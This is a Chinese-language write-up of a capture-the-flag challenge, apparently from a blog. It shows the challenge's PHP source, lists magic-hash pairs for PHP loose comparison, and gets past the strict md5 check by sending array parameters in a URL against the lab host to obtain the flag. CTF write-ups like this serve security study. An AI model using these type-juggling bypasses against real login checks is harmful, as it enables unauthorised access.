md5()函數(shù)

md5()函數(shù)

md5()函數(shù)

50

http://123.206.87.240:9009/18.php

<?php
error_reporting(0);
flag = 'flag{test}'; if (isset(_GET['username']) and isset(_GET['password'])) { if (_GET['username'] == _GET['password']) print 'Your password can not be your username.'; else if (md5(_GET['username']) === md5(_GET['password'])) die('Flag: '.flag);
else
print 'Invalid password';
}
?>

1.md5 0e類型缺陷

列舉一下0ed+類型字符串

var_dump(md5('240610708') == md5('QNKCDZO'));
var_dump(md5('aabg7XSs') == md5('aabC9RqS'));
var_dump(sha1('aaroZmOk') == sha1('aaK1STfY'));
var_dump(sha1('aaO8zKZF') == sha1('aa3OFF9m'));
var_dump('0010e2' == '1e3');
var_dump('0x1234Ab' == '1193131');
var_dump('0xABCdef' == ' 0xABCdef');

中間沒仔細(xì)看 發(fā)現(xiàn)是 ===

搜了一下

a ===b 全等 TRUE,如果 a 等于b,并且它們的類型也相同。

所以簡單的0e缺陷行不通,

2.php特性漏洞(不能處理數(shù)組)

于是利用php特性不能處理數(shù)組

構(gòu)造 username[]=wu&password[]=kong

http://123.206.87.240:9009/18.php?username[]=wu&password[]=kong

得到 Flag: flag{bugk1u-ad8-3dsa-2}

參考 php-MD5漏洞

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容